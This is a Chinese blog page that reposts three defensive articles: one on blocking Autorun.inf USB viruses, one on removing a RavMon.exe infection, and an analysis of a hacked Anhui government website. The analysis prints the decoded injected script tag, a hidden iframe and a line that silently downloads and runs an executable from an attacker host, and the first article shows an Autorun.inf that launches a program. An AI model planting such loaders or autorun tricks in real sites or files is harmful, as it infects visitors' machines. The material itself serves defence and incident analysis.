只需轻松几步 让电脑拒绝重复感染病毒
只需轻松几步 让电脑拒绝重复感染病毒
驱动之家
作者:我爱我家
最近在论坛上不断看到有网友求助
磁盘分区不能双击打开;
插入U盘导致感染病毒;
中了病毒后明明完全重装了系统(指格式化系统盘后重装 或者是ghost恢复下同),但是病毒依然横行。本文将教你导致这些现象的原因,对应的防守策略及解决方法。
首先说说磁盘双击不能打开的原理吧
我们来做个实验,将一个可执行文件放在某个分区的根部录下。例子中是打字练习这个软件。然后我们打开记事本 然后输入
[autorun]
OPEN=打字软件.exe open=输入你的可执行文件的文件名
然后把它保存为名为Autorun.inf文件 也放在该分区的根目录下 如图1:
图1 例子
接下来重启电脑,然后双击该分区,原本是要进入该分区的,但是却执行了你的可执行文件。在盘符上单击右键可以看到多了一个自动播放,如果该可执行文件是个病毒的话,那后果就是。
这就是磁盘分区不能双击打开;插入U盘导致感染病毒的原理。
可以看出Autorun.inf文件就是这类病毒的加载途径。
有些网友会问“我看不到有这个病毒呀”那是因为病毒作者给该文件赋了隐藏属性。
接着网友又会问“我也选择了显示所有文件呀”病毒作者为了达到隐藏的目的,修改了注册表中显示隐藏文件的相关选项,使得你即使选择了显示所有文件,也无法达到显示隐藏文件的目的。
知道了原理,我们来防范此类病毒。
首选方法:组策略法 (该方法适用于xp专业版用户,xp家庭版用户跳过)
具体操作方法 开始→运行→输入gpedit.msc→确定→计算机机配置→管理模板→系统关闭自动播放→已启用→所有驱动器→确定 如图2:
图2 组策略法
这样做以后就不怕病毒通过Autorun.inf 自动播放这个功能来加载了。
第二种方法
在每个分区(U盘)的根目录下建立一个名为Autorun.inf的文件夹 是文件夹而不是文件哦。
这样做有个缺点 就是容易被病毒删除。于是我们可以利用文件名特性来在Autorun.inf的文件夹再建立建立一个不易删除的文件夹。
开始-程序-附件-命令提示符 输入 双引号里边的“md x:\autorun.inf\正常的免疫文件..\”在实际中需把x替换成对应分区的盘符。
中了病毒明明完全重装了系统,但是病毒依然横行。那又是什么原因呢?
原因可能有
第一种情况
就是以上说的,虽然你完全重装了系统,但是其它分区的根目录下的Autorun.inf类病毒还没清除,所以你一双击进入其它分区,即导致重新感染病毒。
解决方法:完全重装系统后先不要进入其它分区,右键单击我的电脑→选搜索→选择所有文件和文件夹→再选择更多高级选项→勾选搜索隐藏文件和文件夹→文件名里填入Autorun.inf→然后按搜索→然后打开任意位于分区根目录下的Autorun.inf 并记录OPEN=xxx.exe 这个文件名→接下来回到搜索窗口→删除所有任意位于分区根目录下的Autorun.inf文件。
接着搜索刚刚记录的xxx.exe(文件名根据实际情况不同)的文件→删除所有任意位于分区根目录下的这些文件。
第二种情况
就是你所中的病毒会感染可执行文件和网页文件。有许多网友喜欢把常用软件的安装程序放在硬盘里,以方便重装系统后或者需要时能即时安装使用。
完全重装系统后第一时间就是安装或直接使用那些常用软件(比如杀毒软件,比如QQ),由于安装程序(可执行程序)已被感染,所以造成病毒重新被激活。
防范方法:为防止安装程序受到病毒感染,可以用压缩文件进行压缩打包,这样做既避免了这些程序感染病毒,又节约了磁盘空间。
解决方法:完全重装系统后,先不要安装或运行原硬盘里的任何程序,可以用光盘或U盘从别人的电脑里拷贝杀毒软件的安装程序过来→安装杀毒软件并升级到最新病毒库→然后用杀毒软件全盘查杀病毒。记住清除病毒过程中需要选择的是清除病毒,而不是删除病毒。清除病毒是指把病毒从正常程序里清除出去,而删除会直接把你的程序也一并删除了。
第三种情况
完全重装系统后由于你的系统没有打上安全补丁,一联网便遭到蠕虫类病毒的自动感染。
防范方法:1.安装并升级杀毒软件并它的开启实时监控后再联网(升级杀毒软件用离线升级包)2.使用超级兔子升级天使为你的系统离线打上补丁后再联网。
教你杀掉双击无法打开驱动器病毒
赛迪网
昨天将U盘插到电脑后双击无法打开,紧接着双击所有驱动器盘符都没有办法打开,试验以后发现只有使用资源管理器可以。但终究不爽,鬼知道病毒在电脑里还干了些什么,决定彻底杀掉。
症状描述
1.双击驱动器盘符无法打开,资源管理器可以使用。
2.在开始→运行里输入cmd进入命令行模式,输入 C:回车 ,进入C盘根目录,输入 dir /a 查看所有文件,发现存在如下两个文件: Autorun.inf RavMon.exe。
3.在开始→运行里输入msconfig,进入系统配置程序,选择“启动”标签,里面有一个叫做 “MDM”的项指向“C:\windows\mdm.exe”。
解决方法
1.重新启动,开机时按F8,进入带命令行的安全模式,选择Administrator账号登陆。
2.在命令行下输入regedit进入注册表,查找"RavMon.exe",如果发现匹配项就删除(我 没有发现,这样做是保险起见)。注意RsRavMon是瑞星杀毒软件,不用删除。
3.在命令行下输入msconfig,进入系统配置程序,选择“启动”标签,将所有“MDM”项前面 的勾去掉保存。
4.在命令行下输入以下指令
del C:\Autorun.inf /f /s /q /a del
C:\RavMon.exe /f /s /q /a del
D:\Autorun.inf /f /s /q /a del
D:\RavMon.exe /f /s /q /a ……
有多少盘符输多少个。注意这个指令会删除根目录往下所有目录的对应文件,所以大家看 到删除了根目录下的以后马上按Ctrl+C中断。
5.重新启动,OK啦。
6.要彻底清楚,主要还是要把U盘里的毒源杀掉。我没有试别的办法,直接偷懒进Linux下 用rm删了个干净。如果大家认识的人有装Linux的可以请他帮忙,个人认为这样做是最安全的。在Windows/Dos平台下怎么做还请高手出招。
说明
1.MDM是微软的Machine Debug Manager,系统进程;病毒伪装成了mdm.exe。
2.本杀毒方法思想可用于清除类似病毒。
数字安徽网挂马网事件分析及预防
在探索Google搜索结果过滤网页恶意病毒过程中,发现安徽某政府网亦被恶意入侵者攻陷并插入恶意病毒下载指令。
点击访问“数字安徽”主页(hxxp://www.digitalanhui.gov.cn/)后,终截者随即弹出拦截到的网站恶意木马,如下图所示:
终截者抗病毒软件安全狗成功拦截到恶意挂马病毒
查看主页源文件代码,仔细检查后发现可疑挂马指令:
这段挂马指令经过了 unescape码加密,因此我们还需要还原他本来面目,解密过程通过Unicode码的转换实现即可。
还原如下:
Ø %3Cscript%20src%3D%22http%3A//w1e.cn/js/1.js%22%3E%3C/script%3E
ü <script src="http://w1e.cn/js/1.js"></script>
下载 hxxp://w1e.cn/js/1.js 查看其源文件,发现该脚本调用了另一个Htm文件,其内容如下:document.write("<iframe width='0' height='0' src='http://w1e.cn/js/1.htm'></iframe>");
直接打开这个网页,会被表面现象所蒙蔽,因此这并不是本来面目,如下图所示
这里的源代码解密较周折,我们直接来看结果:
客户端如果没有做好漏洞防护或安装终截者抗病毒软件的话,就有可能直接中招,触发漏洞后,会直接从 http://w1e.cn/js/1.exe 下载病毒体到 C:\NTDETECT.EXE并由 1.vbs解释执行(wscript.createobject("wscript.shell").run "C:\NTDETECT.EXE",0)
1. 漏洞说明:
Microsoft XML核心服务 XMLHTTP控件代码执行漏洞 (MS07-017漏洞)
受影响系统:
Microsoft XML Core Services 4.0
- Microsoft Windows XP SP2
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
- Microsoft Windows 2000 SP4
描述:
Microsoft XML核心服务(MSXML)允许使用JScript、VBScript和Microsoft Visual Studio 6.0的用户构建可与其他符合XML 1.0标准的应用程序相互操作的XML应用。
在Microsoft XML Core Services 4.0的XMLHTTP 4.0 ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。
2. 漏洞利用
这个漏洞主要是利用两个对象Microsoft.XMLHTTP和Adodb.Stream。
具体过程不做还原演示,此处略。
3. 预防
修复补丁或安装具有抗漏洞攻击的终截者抗病毒软件(hxxp://www.s-sos.net)。
没有评论:
发表评论